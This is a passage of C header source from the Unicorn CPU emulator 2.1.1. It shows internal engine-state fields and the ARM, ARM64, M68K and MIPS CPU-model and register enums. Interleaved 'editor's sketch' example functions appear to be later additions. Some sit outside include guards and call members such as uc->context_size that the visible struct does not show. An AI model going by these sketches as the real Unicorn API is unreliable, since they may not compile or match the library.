                      // uc_emu_start()); also see UC_CTL_USE_EXITS for more
                      // details

    int thumb; // thumb mode for ARM
    MemoryRegion **mapped_blocks;
    uint32_t mapped_block_count;
    uint32_t mapped_block_cache_index;
    void *qemu_thread_data; // to support cross-compilation to Windows
                            // (qemu-thread-win32.c)
    uint32_t target_page_size;
    uint32_t target_page_align;
    uint64_t qemu_host_page_size;
    uint64_t qemu_real_host_page_size;
    int qemu_icache_linesize;
    /* ARCH_REGS_STORAGE_SIZE */
    uc_context_content context_content;
    int cpu_context_size;
    uint64_t next_pc; // save next PC for some special cases
    bool hook_insert; // insert a new hook at the beginning of the hook list
                      // (append by default)
    bool first_tb; // is this the first Translation-Block ever generated since
                   // uc_emu_start()?
    bool no_exit_request; // disable check_exit_request temporarily; a
                          // workaround to treat the IT block as a whole block
    bool init_done;       // whether the initialization is done
    sigjmp_buf jmp_bufs[UC_MAX_NESTED_LEVEL]; // to support nested
                                              // uc_emu_start
    int nested_level;                         // current nested level
    struct TranslationBlock *last_tb; // the real last TB we executed
    FlatView *empty_view; // static function variable moved from
                          // flatviews_init
    uint32_t tcg_buffer_size; // the buffer size we are going to use
#ifdef WIN32
    PVOID seh_handle;
    void *seh_closure;
#endif
    GArray *unmapped_regions;
    int32_t snapshot_level; // the current memory snapshot level
    uint64_t nested;        // the nested level of all exposed API
    bool thread_executable_entry;
    bool current_executable;
};

// Metadata stub for the variable-size cpu context used with uc_context_*()
struct uc_context {
    size_t context_size; // size of the real internal context structure
    uc_mode mode;        // the mode of this context
    uc_arch arch;        // the arch of this context
    int snapshot_level;  // the memory snapshot level to restore
    char data[0];        // the context data, allocated inline past this header
};
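/* Example (editor's sketch): how a variable-size uc_context would be
 * allocated. The flexible data[] member means the header and the saved CPU
 * state live in one allocation; `ctx_size` would come from
 * uc->context_size(uc). g_malloc0 aborts on OOM, so no NULL check is
 * needed. */
static inline struct uc_context *context_alloc_demo(struct uc_struct *uc)
{
    size_t ctx_size = uc->context_size(uc);
    struct uc_context *ctx = g_malloc0(sizeof(struct uc_context) + ctx_size);

    ctx->context_size = ctx_size; // bytes available at ctx->data
    ctx->arch = uc->arch;
    ctx->mode = uc->mode;
    return ctx;
}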
// We have to support 32-bit systems, so we can't hold a uint64_t in a void*
static inline void uc_add_exit(uc_engine *uc, uint64_t addr)
{
    uint64_t *new_exit = g_malloc(sizeof(uint64_t));
    *new_exit = addr;
    g_tree_insert(uc->ctl_exits, (gpointer)new_exit, (gpointer)1);
}

// This function has to exist since we would like to accept uint32_t as well,
// and it is complex to achieve that otherwise.
static inline int uc_addr_is_exit(uc_engine *uc, uint64_t addr)
{
    if (uc->use_exits) {
        return g_tree_lookup(uc->ctl_exits, (gpointer)(&addr)) == (gpointer)1;
    } else {
        return uc->exits[uc->nested_level - 1] == addr;
    }
}

typedef struct HookedRegion {
    uint64_t start;
    uint64_t length;
} HookedRegion;

// hooked_regions related functions
static inline guint hooked_regions_hash(const void *p)
{
    HookedRegion *region = (HookedRegion *)p;

    return qemu_xxhash4(region->start, region->length);
}

static inline gboolean hooked_regions_equal(const void *lhs, const void *rhs)
{
    HookedRegion *l = (HookedRegion *)lhs;
    HookedRegion *r = (HookedRegion *)rhs;

    return l->start == r->start && l->length == r->length;
}

static inline void hooked_regions_add(struct hook *h, uint64_t start,
                                      uint64_t length)
{
    HookedRegion tmp;
    tmp.start = start;
    tmp.length = length;

    if (!g_hash_table_lookup(h->hooked_regions, (void *)&tmp)) {
        HookedRegion *r = malloc(sizeof(HookedRegion));
        r->start = start;
        r->length = length;
        g_hash_table_insert(h->hooked_regions, (void *)r, (void *)1);
    }
}

static inline void hooked_regions_check_single(struct list_item *cur,
                                               uint64_t start, uint64_t length)
{
    while (cur != NULL) {
        if (HOOK_BOUND_CHECK((struct hook *)cur->data, start)) {
            hooked_regions_add((struct hook *)cur->data, start, length);
        }
        cur = cur->next;
    }
}

static inline void hooked_regions_check(uc_engine *uc, uint64_t start,
                                        uint64_t length)
{
    // Only UC_HOOK_BLOCK and UC_HOOK_CODE might be wrongly cached!
    hooked_regions_check_single(uc->hook[UC_HOOK_CODE_IDX].head, start,
                                length);
    hooked_regions_check_single(uc->hook[UC_HOOK_BLOCK_IDX].head, start,
                                length);
}

/* Break the translation loop. This is done in two cases:
   1. the user wants to stop the emulation
   2. the user has set the PC; this requires restarting the internal CPU
      emulation and rebuilding some translation blocks */
static inline uc_err break_translation_loop(uc_engine *uc)
{
    if (uc->emulation_done) {
        return UC_ERR_OK;
    }

    // TODO: make this atomic somehow?
    if (uc->cpu) {
        // exit the current TB
        cpu_exit(uc->cpu);
    }

    return UC_ERR_OK;
}
#ifdef UNICORN_TRACER
#define UC_TRACE_START(loc) trace_start(get_tracer(), loc)
#define UC_TRACE_END(loc, fmt, ...)                                            \
    trace_end(get_tracer(), loc, fmt, __VA_ARGS__)

typedef enum trace_loc {
    UC_TRACE_TB_EXEC = 0,
    UC_TRACE_TB_TRANS,
    UC_TRACER_MAX
} trace_loc;

typedef struct uc_tracer {
    int64_t starts[UC_TRACER_MAX];
} uc_tracer;

uc_tracer *get_tracer();

void trace_start(uc_tracer *tracer, trace_loc loc);

void trace_end(uc_tracer *tracer, trace_loc loc, const char *fmt, ...);
#else
#define UC_TRACE_START(loc)
#define UC_TRACE_END(loc, fmt, ...)
#endif

#endif
/* vim: set ts=4 noet: */

unicorn-2.1.1/include/unicorn/arm.h

/* Unicorn Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_ARM_H
#define UNICORN_ARM_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> ARM CPU
typedef enum uc_cpu_arm {
    UC_CPU_ARM_926 = 0,
    UC_CPU_ARM_946, UC_CPU_ARM_1026, UC_CPU_ARM_1136_R2, UC_CPU_ARM_1136,
    UC_CPU_ARM_1176, UC_CPU_ARM_11MPCORE,
    UC_CPU_ARM_CORTEX_M0, UC_CPU_ARM_CORTEX_M3, UC_CPU_ARM_CORTEX_M4,
    UC_CPU_ARM_CORTEX_M7, UC_CPU_ARM_CORTEX_M33,
    UC_CPU_ARM_CORTEX_R5, UC_CPU_ARM_CORTEX_R5F,
    UC_CPU_ARM_CORTEX_A7, UC_CPU_ARM_CORTEX_A8, UC_CPU_ARM_CORTEX_A9,
    UC_CPU_ARM_CORTEX_A15,
    UC_CPU_ARM_TI925T, UC_CPU_ARM_SA1100, UC_CPU_ARM_SA1110,
    UC_CPU_ARM_PXA250, UC_CPU_ARM_PXA255, UC_CPU_ARM_PXA260,
    UC_CPU_ARM_PXA261, UC_CPU_ARM_PXA262, UC_CPU_ARM_PXA270,
    UC_CPU_ARM_PXA270A0, UC_CPU_ARM_PXA270A1, UC_CPU_ARM_PXA270B0,
    UC_CPU_ARM_PXA270B1, UC_CPU_ARM_PXA270C0, UC_CPU_ARM_PXA270C5,
    UC_CPU_ARM_MAX,
    UC_CPU_ARM_ENDING
} uc_cpu_arm;
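/* Example (editor's sketch): selecting one of the CPU models above through
 * the public uc_ctl interface from unicorn.h. uc_ctl_set_cpu_model() is the
 * convenience macro wrapping UC_CTL_CPU_MODEL; the model should be set right
 * after uc_open(), before the CPU state is first used. */
static uc_err open_cortex_m33_demo(uc_engine **uc)
{
    uc_err err = uc_open(UC_ARCH_ARM, UC_MODE_THUMB | UC_MODE_MCLASS, uc);
    if (err != UC_ERR_OK) {
        return err;
    }
    return uc_ctl_set_cpu_model(*uc, UC_CPU_ARM_CORTEX_M33);
}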
// ARM coprocessor registers. Use this with UC_ARM_REG_CP_REG in calls to
// uc_reg_write()/uc_reg_read() to access these registers.
typedef struct uc_arm_cp_reg {
    uint32_t cp;   // The coprocessor identifier
    uint32_t is64; // Is it a 64 bit control register
    uint32_t sec;  // Security state
    uint32_t crn;  // Coprocessor register number
    uint32_t crm;  // Coprocessor register number
    uint32_t opc1; // Opcode1
    uint32_t opc2; // Opcode2
    uint64_t val;  // The value to read/write
} uc_arm_cp_reg;

//> ARM registers
typedef enum uc_arm_reg {
    UC_ARM_REG_INVALID = 0,
    UC_ARM_REG_APSR, UC_ARM_REG_APSR_NZCV, UC_ARM_REG_CPSR,
    UC_ARM_REG_FPEXC, UC_ARM_REG_FPINST, UC_ARM_REG_FPSCR,
    UC_ARM_REG_FPSCR_NZCV, UC_ARM_REG_FPSID, UC_ARM_REG_ITSTATE,
    UC_ARM_REG_LR, UC_ARM_REG_PC, UC_ARM_REG_SP, UC_ARM_REG_SPSR,
    UC_ARM_REG_D0, UC_ARM_REG_D1, UC_ARM_REG_D2, UC_ARM_REG_D3,
    UC_ARM_REG_D4, UC_ARM_REG_D5, UC_ARM_REG_D6, UC_ARM_REG_D7,
    UC_ARM_REG_D8, UC_ARM_REG_D9, UC_ARM_REG_D10, UC_ARM_REG_D11,
    UC_ARM_REG_D12, UC_ARM_REG_D13, UC_ARM_REG_D14, UC_ARM_REG_D15,
    UC_ARM_REG_D16, UC_ARM_REG_D17, UC_ARM_REG_D18, UC_ARM_REG_D19,
    UC_ARM_REG_D20, UC_ARM_REG_D21, UC_ARM_REG_D22, UC_ARM_REG_D23,
    UC_ARM_REG_D24, UC_ARM_REG_D25, UC_ARM_REG_D26, UC_ARM_REG_D27,
    UC_ARM_REG_D28, UC_ARM_REG_D29, UC_ARM_REG_D30, UC_ARM_REG_D31,
    UC_ARM_REG_FPINST2, UC_ARM_REG_MVFR0, UC_ARM_REG_MVFR1,
    UC_ARM_REG_MVFR2,
    UC_ARM_REG_Q0, UC_ARM_REG_Q1, UC_ARM_REG_Q2, UC_ARM_REG_Q3,
    UC_ARM_REG_Q4, UC_ARM_REG_Q5, UC_ARM_REG_Q6, UC_ARM_REG_Q7,
    UC_ARM_REG_Q8, UC_ARM_REG_Q9, UC_ARM_REG_Q10, UC_ARM_REG_Q11,
    UC_ARM_REG_Q12, UC_ARM_REG_Q13, UC_ARM_REG_Q14, UC_ARM_REG_Q15,
    UC_ARM_REG_R0, UC_ARM_REG_R1, UC_ARM_REG_R2, UC_ARM_REG_R3,
    UC_ARM_REG_R4, UC_ARM_REG_R5, UC_ARM_REG_R6, UC_ARM_REG_R7,
    UC_ARM_REG_R8, UC_ARM_REG_R9, UC_ARM_REG_R10, UC_ARM_REG_R11,
    UC_ARM_REG_R12,
    UC_ARM_REG_S0, UC_ARM_REG_S1, UC_ARM_REG_S2, UC_ARM_REG_S3,
    UC_ARM_REG_S4, UC_ARM_REG_S5, UC_ARM_REG_S6, UC_ARM_REG_S7,
    UC_ARM_REG_S8, UC_ARM_REG_S9, UC_ARM_REG_S10, UC_ARM_REG_S11,
    UC_ARM_REG_S12, UC_ARM_REG_S13, UC_ARM_REG_S14, UC_ARM_REG_S15,
    UC_ARM_REG_S16, UC_ARM_REG_S17, UC_ARM_REG_S18, UC_ARM_REG_S19,
    UC_ARM_REG_S20, UC_ARM_REG_S21, UC_ARM_REG_S22, UC_ARM_REG_S23,
    UC_ARM_REG_S24, UC_ARM_REG_S25, UC_ARM_REG_S26, UC_ARM_REG_S27,
    UC_ARM_REG_S28, UC_ARM_REG_S29, UC_ARM_REG_S30, UC_ARM_REG_S31,
    UC_ARM_REG_C1_C0_2,  // Deprecated, use UC_ARM_REG_CP_REG instead
    UC_ARM_REG_C13_C0_2, // Deprecated, use UC_ARM_REG_CP_REG instead
    UC_ARM_REG_C13_C0_3, // Deprecated, use UC_ARM_REG_CP_REG instead
    UC_ARM_REG_IPSR, UC_ARM_REG_MSP, UC_ARM_REG_PSP, UC_ARM_REG_CONTROL,
    UC_ARM_REG_IAPSR, UC_ARM_REG_EAPSR, UC_ARM_REG_XPSR, UC_ARM_REG_EPSR,
    UC_ARM_REG_IEPSR, UC_ARM_REG_PRIMASK, UC_ARM_REG_BASEPRI,
    UC_ARM_REG_BASEPRI_MAX, UC_ARM_REG_FAULTMASK, UC_ARM_REG_APSR_NZCVQ,
    UC_ARM_REG_APSR_G, UC_ARM_REG_APSR_NZCVQG, UC_ARM_REG_IAPSR_NZCVQ,
    UC_ARM_REG_IAPSR_G, UC_ARM_REG_IAPSR_NZCVQG, UC_ARM_REG_EAPSR_NZCVQ,
    UC_ARM_REG_EAPSR_G, UC_ARM_REG_EAPSR_NZCVQG, UC_ARM_REG_XPSR_NZCVQ,
    UC_ARM_REG_XPSR_G, UC_ARM_REG_XPSR_NZCVQG,
    UC_ARM_REG_CP_REG,

    UC_ARM_REG_ENDING, // <-- mark the end of the list of registers

    //> alias registers
    UC_ARM_REG_R13 = UC_ARM_REG_SP,
    UC_ARM_REG_R14 = UC_ARM_REG_LR,
    UC_ARM_REG_R15 = UC_ARM_REG_PC,
    UC_ARM_REG_SB = UC_ARM_REG_R9,
    UC_ARM_REG_SL = UC_ARM_REG_R10,
    UC_ARM_REG_FP = UC_ARM_REG_R11,
    UC_ARM_REG_IP = UC_ARM_REG_R12,
} uc_arm_reg;

#ifdef __cplusplus
}
#endif

#endif
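/* Example (editor's sketch): reading an ARM coprocessor register through
 * UC_ARM_REG_CP_REG via the public uc_reg_read() from unicorn.h. The field
 * values are illustrative; c13/c0/3 on CP15 is what the deprecated
 * UC_ARM_REG_C13_C0_3 used to name. */
static uc_err read_cp15_demo(uc_engine *uc, uint64_t *out)
{
    uc_arm_cp_reg reg = {0};
    reg.cp = 15;  // CP15
    reg.is64 = 0; // 32-bit register
    reg.sec = 0;  // non-secure state
    reg.crn = 13;
    reg.crm = 0;
    reg.opc1 = 0;
    reg.opc2 = 3;

    uc_err err = uc_reg_read(uc, UC_ARM_REG_CP_REG, &reg);
    if (err == UC_ERR_OK) {
        *out = reg.val; // the value comes back in .val
    }
    return err;
}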
unicorn-2.1.1/include/unicorn/arm64.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_ARM64_H
#define UNICORN_ARM64_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> ARM64 CPU
typedef enum uc_cpu_arm64 {
    UC_CPU_ARM64_A57 = 0,
    UC_CPU_ARM64_A53,
    UC_CPU_ARM64_A72,
    UC_CPU_ARM64_MAX,
    UC_CPU_ARM64_ENDING
} uc_cpu_arm64;

// ARM64 coprocessor registers. Use this with UC_ARM64_REG_CP_REG in calls to
// uc_reg_write()/uc_reg_read() to access these registers.
typedef struct uc_arm64_cp_reg {
    uint32_t crn; // Coprocessor register number
    uint32_t crm; // Coprocessor register number
    uint32_t op0; // Opcode0
    uint32_t op1; // Opcode1
    uint32_t op2; // Opcode2
    uint64_t val; // The value to read/write
} uc_arm64_cp_reg;

//> ARM64 registers
typedef enum uc_arm64_reg {
    UC_ARM64_REG_INVALID = 0,
    UC_ARM64_REG_X29, UC_ARM64_REG_X30, UC_ARM64_REG_NZCV, UC_ARM64_REG_SP,
    UC_ARM64_REG_WSP, UC_ARM64_REG_WZR, UC_ARM64_REG_XZR,
    UC_ARM64_REG_B0, UC_ARM64_REG_B1, UC_ARM64_REG_B2, UC_ARM64_REG_B3,
    UC_ARM64_REG_B4, UC_ARM64_REG_B5, UC_ARM64_REG_B6, UC_ARM64_REG_B7,
    UC_ARM64_REG_B8, UC_ARM64_REG_B9, UC_ARM64_REG_B10, UC_ARM64_REG_B11,
    UC_ARM64_REG_B12, UC_ARM64_REG_B13, UC_ARM64_REG_B14, UC_ARM64_REG_B15,
    UC_ARM64_REG_B16, UC_ARM64_REG_B17, UC_ARM64_REG_B18, UC_ARM64_REG_B19,
    UC_ARM64_REG_B20, UC_ARM64_REG_B21, UC_ARM64_REG_B22, UC_ARM64_REG_B23,
    UC_ARM64_REG_B24, UC_ARM64_REG_B25, UC_ARM64_REG_B26, UC_ARM64_REG_B27,
    UC_ARM64_REG_B28, UC_ARM64_REG_B29, UC_ARM64_REG_B30, UC_ARM64_REG_B31,
    UC_ARM64_REG_D0, UC_ARM64_REG_D1, UC_ARM64_REG_D2, UC_ARM64_REG_D3,
    UC_ARM64_REG_D4, UC_ARM64_REG_D5, UC_ARM64_REG_D6, UC_ARM64_REG_D7,
    UC_ARM64_REG_D8, UC_ARM64_REG_D9, UC_ARM64_REG_D10, UC_ARM64_REG_D11,
    UC_ARM64_REG_D12, UC_ARM64_REG_D13, UC_ARM64_REG_D14, UC_ARM64_REG_D15,
    UC_ARM64_REG_D16, UC_ARM64_REG_D17, UC_ARM64_REG_D18, UC_ARM64_REG_D19,
    UC_ARM64_REG_D20, UC_ARM64_REG_D21, UC_ARM64_REG_D22, UC_ARM64_REG_D23,
    UC_ARM64_REG_D24, UC_ARM64_REG_D25, UC_ARM64_REG_D26, UC_ARM64_REG_D27,
    UC_ARM64_REG_D28, UC_ARM64_REG_D29, UC_ARM64_REG_D30, UC_ARM64_REG_D31,
    UC_ARM64_REG_H0, UC_ARM64_REG_H1, UC_ARM64_REG_H2, UC_ARM64_REG_H3,
    UC_ARM64_REG_H4, UC_ARM64_REG_H5, UC_ARM64_REG_H6, UC_ARM64_REG_H7,
    UC_ARM64_REG_H8, UC_ARM64_REG_H9, UC_ARM64_REG_H10, UC_ARM64_REG_H11,
    UC_ARM64_REG_H12, UC_ARM64_REG_H13, UC_ARM64_REG_H14, UC_ARM64_REG_H15,
    UC_ARM64_REG_H16, UC_ARM64_REG_H17, UC_ARM64_REG_H18, UC_ARM64_REG_H19,
    UC_ARM64_REG_H20, UC_ARM64_REG_H21, UC_ARM64_REG_H22, UC_ARM64_REG_H23,
    UC_ARM64_REG_H24, UC_ARM64_REG_H25,
    UC_ARM64_REG_H26, UC_ARM64_REG_H27, UC_ARM64_REG_H28, UC_ARM64_REG_H29,
    UC_ARM64_REG_H30, UC_ARM64_REG_H31,
    UC_ARM64_REG_Q0, UC_ARM64_REG_Q1, UC_ARM64_REG_Q2, UC_ARM64_REG_Q3,
    UC_ARM64_REG_Q4, UC_ARM64_REG_Q5, UC_ARM64_REG_Q6, UC_ARM64_REG_Q7,
    UC_ARM64_REG_Q8, UC_ARM64_REG_Q9, UC_ARM64_REG_Q10, UC_ARM64_REG_Q11,
    UC_ARM64_REG_Q12, UC_ARM64_REG_Q13, UC_ARM64_REG_Q14, UC_ARM64_REG_Q15,
    UC_ARM64_REG_Q16, UC_ARM64_REG_Q17, UC_ARM64_REG_Q18, UC_ARM64_REG_Q19,
    UC_ARM64_REG_Q20, UC_ARM64_REG_Q21, UC_ARM64_REG_Q22, UC_ARM64_REG_Q23,
    UC_ARM64_REG_Q24, UC_ARM64_REG_Q25, UC_ARM64_REG_Q26, UC_ARM64_REG_Q27,
    UC_ARM64_REG_Q28, UC_ARM64_REG_Q29, UC_ARM64_REG_Q30, UC_ARM64_REG_Q31,
    UC_ARM64_REG_S0, UC_ARM64_REG_S1, UC_ARM64_REG_S2, UC_ARM64_REG_S3,
    UC_ARM64_REG_S4, UC_ARM64_REG_S5, UC_ARM64_REG_S6, UC_ARM64_REG_S7,
    UC_ARM64_REG_S8, UC_ARM64_REG_S9, UC_ARM64_REG_S10, UC_ARM64_REG_S11,
    UC_ARM64_REG_S12, UC_ARM64_REG_S13, UC_ARM64_REG_S14, UC_ARM64_REG_S15,
    UC_ARM64_REG_S16, UC_ARM64_REG_S17, UC_ARM64_REG_S18, UC_ARM64_REG_S19,
    UC_ARM64_REG_S20, UC_ARM64_REG_S21, UC_ARM64_REG_S22, UC_ARM64_REG_S23,
    UC_ARM64_REG_S24, UC_ARM64_REG_S25, UC_ARM64_REG_S26, UC_ARM64_REG_S27,
    UC_ARM64_REG_S28, UC_ARM64_REG_S29, UC_ARM64_REG_S30, UC_ARM64_REG_S31,
    UC_ARM64_REG_W0, UC_ARM64_REG_W1, UC_ARM64_REG_W2, UC_ARM64_REG_W3,
    UC_ARM64_REG_W4, UC_ARM64_REG_W5, UC_ARM64_REG_W6, UC_ARM64_REG_W7,
    UC_ARM64_REG_W8, UC_ARM64_REG_W9, UC_ARM64_REG_W10, UC_ARM64_REG_W11,
    UC_ARM64_REG_W12, UC_ARM64_REG_W13, UC_ARM64_REG_W14, UC_ARM64_REG_W15,
    UC_ARM64_REG_W16, UC_ARM64_REG_W17, UC_ARM64_REG_W18, UC_ARM64_REG_W19,
    UC_ARM64_REG_W20, UC_ARM64_REG_W21, UC_ARM64_REG_W22, UC_ARM64_REG_W23,
    UC_ARM64_REG_W24, UC_ARM64_REG_W25, UC_ARM64_REG_W26, UC_ARM64_REG_W27,
    UC_ARM64_REG_W28, UC_ARM64_REG_W29, UC_ARM64_REG_W30,
    UC_ARM64_REG_X0, UC_ARM64_REG_X1, UC_ARM64_REG_X2, UC_ARM64_REG_X3,
    UC_ARM64_REG_X4, UC_ARM64_REG_X5, UC_ARM64_REG_X6, UC_ARM64_REG_X7,
    UC_ARM64_REG_X8, UC_ARM64_REG_X9, UC_ARM64_REG_X10, UC_ARM64_REG_X11,
    UC_ARM64_REG_X12, UC_ARM64_REG_X13, UC_ARM64_REG_X14, UC_ARM64_REG_X15,
    UC_ARM64_REG_X16, UC_ARM64_REG_X17, UC_ARM64_REG_X18, UC_ARM64_REG_X19,
    UC_ARM64_REG_X20, UC_ARM64_REG_X21, UC_ARM64_REG_X22, UC_ARM64_REG_X23,
    UC_ARM64_REG_X24, UC_ARM64_REG_X25, UC_ARM64_REG_X26, UC_ARM64_REG_X27,
    UC_ARM64_REG_X28,
    UC_ARM64_REG_V0, UC_ARM64_REG_V1, UC_ARM64_REG_V2, UC_ARM64_REG_V3,
    UC_ARM64_REG_V4, UC_ARM64_REG_V5, UC_ARM64_REG_V6, UC_ARM64_REG_V7,
    UC_ARM64_REG_V8, UC_ARM64_REG_V9, UC_ARM64_REG_V10, UC_ARM64_REG_V11,
    UC_ARM64_REG_V12, UC_ARM64_REG_V13, UC_ARM64_REG_V14, UC_ARM64_REG_V15,
    UC_ARM64_REG_V16, UC_ARM64_REG_V17, UC_ARM64_REG_V18, UC_ARM64_REG_V19,
    UC_ARM64_REG_V20, UC_ARM64_REG_V21, UC_ARM64_REG_V22, UC_ARM64_REG_V23,
    UC_ARM64_REG_V24, UC_ARM64_REG_V25, UC_ARM64_REG_V26, UC_ARM64_REG_V27,
    UC_ARM64_REG_V28, UC_ARM64_REG_V29, UC_ARM64_REG_V30, UC_ARM64_REG_V31,

    //> pseudo registers
    UC_ARM64_REG_PC, // program counter register
    UC_ARM64_REG_CPACR_EL1,

    //> thread registers. Deprecated, use UC_ARM64_REG_CP_REG instead
    UC_ARM64_REG_TPIDR_EL0,
    UC_ARM64_REG_TPIDRRO_EL0,
    UC_ARM64_REG_TPIDR_EL1,

    UC_ARM64_REG_PSTATE,

    //> exception link registers. Deprecated, use UC_ARM64_REG_CP_REG instead
    UC_ARM64_REG_ELR_EL0, UC_ARM64_REG_ELR_EL1, UC_ARM64_REG_ELR_EL2,
    UC_ARM64_REG_ELR_EL3,

    //> stack pointer registers. Deprecated, use UC_ARM64_REG_CP_REG instead
    UC_ARM64_REG_SP_EL0, UC_ARM64_REG_SP_EL1, UC_ARM64_REG_SP_EL2,
    UC_ARM64_REG_SP_EL3,

    //> other CP15 registers. Deprecated, use UC_ARM64_REG_CP_REG instead
    UC_ARM64_REG_TTBR0_EL1,
    UC_ARM64_REG_TTBR1_EL1,
    UC_ARM64_REG_ESR_EL0, UC_ARM64_REG_ESR_EL1, UC_ARM64_REG_ESR_EL2,
    UC_ARM64_REG_ESR_EL3,
    UC_ARM64_REG_FAR_EL0, UC_ARM64_REG_FAR_EL1, UC_ARM64_REG_FAR_EL2,
    UC_ARM64_REG_FAR_EL3,
    UC_ARM64_REG_PAR_EL1,
    UC_ARM64_REG_MAIR_EL1,
    UC_ARM64_REG_VBAR_EL0, UC_ARM64_REG_VBAR_EL1, UC_ARM64_REG_VBAR_EL2,
    UC_ARM64_REG_VBAR_EL3,

    UC_ARM64_REG_CP_REG,

    //> floating point control and status registers
    UC_ARM64_REG_FPCR,
    UC_ARM64_REG_FPSR,

    UC_ARM64_REG_ENDING, // <-- mark the end of the list of registers

    //> alias registers
    UC_ARM64_REG_IP0 = UC_ARM64_REG_X16,
    UC_ARM64_REG_IP1 = UC_ARM64_REG_X17,
    UC_ARM64_REG_FP = UC_ARM64_REG_X29,
    UC_ARM64_REG_LR = UC_ARM64_REG_X30,
} uc_arm64_reg;

// Callback function for tracing MRS/MSR/SYS/SYSL. If this callback returns
// true, the read/write to the system registers is skipped (even though it
// may cause exceptions!). Note that only one callback per instruction is
// allowed.
// @reg: The source/destination register.
// @cp_reg: The source/destination system register.
// @user_data: The user data.
typedef uint32_t (*uc_cb_insn_sys_t)(uc_engine *uc, uc_arm64_reg reg,
                                     const uc_arm64_cp_reg *cp_reg,
                                     void *user_data);

//> ARM64 instructions
typedef enum uc_arm64_insn {
    UC_ARM64_INS_INVALID = 0,
    UC_ARM64_INS_MRS,
    UC_ARM64_INS_MSR,
    UC_ARM64_INS_SYS,
    UC_ARM64_INS_SYSL,
    UC_ARM64_INS_ENDING
} uc_arm64_insn;

#ifdef __cplusplus
}
#endif

#endif
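/* Example (editor's sketch): registering a uc_cb_insn_sys_t callback for the
 * MRS instruction via the public uc_hook_add() from unicorn.h. For
 * UC_HOOK_INSN, the trailing variadic argument selects which instruction to
 * instrument; begin=1 and end=0 (begin > end) means "hook everywhere". */
static uint32_t on_mrs_demo(uc_engine *uc, uc_arm64_reg reg,
                            const uc_arm64_cp_reg *cp_reg, void *user_data)
{
    // Inspect which system register the MRS encodes.
    printf("MRS x%d <- op0=%u op1=%u crn=%u crm=%u op2=%u\n", (int)reg,
           cp_reg->op0, cp_reg->op1, cp_reg->crn, cp_reg->crm, cp_reg->op2);
    return 0; // 0: perform the normal access; nonzero: skip it
}

static uc_err hook_mrs_demo(uc_engine *uc)
{
    uc_hook hh;
    return uc_hook_add(uc, &hh, UC_HOOK_INSN, (void *)on_mrs_demo, NULL, 1, 0,
                       UC_ARM64_INS_MRS);
}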
unicorn-2.1.1/include/unicorn/m68k.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2014-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_M68K_H
#define UNICORN_M68K_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> M68K CPU
typedef enum uc_cpu_m68k {
    UC_CPU_M68K_M5206 = 0,
    UC_CPU_M68K_M68000, UC_CPU_M68K_M68020, UC_CPU_M68K_M68030,
    UC_CPU_M68K_M68040, UC_CPU_M68K_M68060, UC_CPU_M68K_M5208,
    UC_CPU_M68K_CFV4E, UC_CPU_M68K_ANY,
    UC_CPU_M68K_ENDING
} uc_cpu_m68k;

//> M68K registers
typedef enum uc_m68k_reg {
    UC_M68K_REG_INVALID = 0,
    UC_M68K_REG_A0, UC_M68K_REG_A1, UC_M68K_REG_A2, UC_M68K_REG_A3,
    UC_M68K_REG_A4, UC_M68K_REG_A5, UC_M68K_REG_A6, UC_M68K_REG_A7,
    UC_M68K_REG_D0, UC_M68K_REG_D1, UC_M68K_REG_D2, UC_M68K_REG_D3,
    UC_M68K_REG_D4, UC_M68K_REG_D5, UC_M68K_REG_D6, UC_M68K_REG_D7,
    UC_M68K_REG_SR,
    UC_M68K_REG_PC,

    UC_M68K_REG_ENDING, // <-- mark the end of the list of registers
} uc_m68k_reg;

#ifdef __cplusplus
}
#endif

#endif

unicorn-2.1.1/include/unicorn/mips.h

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */
#ifndef UNICORN_MIPS_H
#define UNICORN_MIPS_H

#ifdef __cplusplus
extern "C" {
#endif

// The GCC MIPS toolchain has a default macro called "mips" which breaks
// compilation
#undef mips

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> MIPS32 CPUS
typedef enum uc_cpu_mips32 {
    UC_CPU_MIPS32_4KC = 0,
    UC_CPU_MIPS32_4KM, UC_CPU_MIPS32_4KECR1, UC_CPU_MIPS32_4KEMR1,
    UC_CPU_MIPS32_4KEC, UC_CPU_MIPS32_4KEM,
    UC_CPU_MIPS32_24KC, UC_CPU_MIPS32_24KEC, UC_CPU_MIPS32_24KF,
    UC_CPU_MIPS32_34KF, UC_CPU_MIPS32_74KF,
    UC_CPU_MIPS32_M14K, UC_CPU_MIPS32_M14KC,
    UC_CPU_MIPS32_P5600,
    UC_CPU_MIPS32_MIPS32R6_GENERIC,
    UC_CPU_MIPS32_I7200,
    UC_CPU_MIPS32_ENDING
} uc_cpu_mips32;

//> MIPS64 CPUS
typedef enum uc_cpu_mips64 {
    UC_CPU_MIPS64_R4000 = 0,
    UC_CPU_MIPS64_VR5432,
    UC_CPU_MIPS64_5KC, UC_CPU_MIPS64_5KF,
    UC_CPU_MIPS64_20KC,
    UC_CPU_MIPS64_MIPS64R2_GENERIC,
    UC_CPU_MIPS64_5KEC, UC_CPU_MIPS64_5KEF,
    UC_CPU_MIPS64_I6400, UC_CPU_MIPS64_I6500,
    UC_CPU_MIPS64_LOONGSON_2E, UC_CPU_MIPS64_LOONGSON_2F,
    UC_CPU_MIPS64_MIPS64DSPR2,
    UC_CPU_MIPS64_ENDING
} uc_cpu_mips64;

//> MIPS registers
typedef enum UC_MIPS_REG {
    UC_MIPS_REG_INVALID = 0,

    //> General purpose registers
    UC_MIPS_REG_PC,
    UC_MIPS_REG_0, UC_MIPS_REG_1, UC_MIPS_REG_2, UC_MIPS_REG_3,
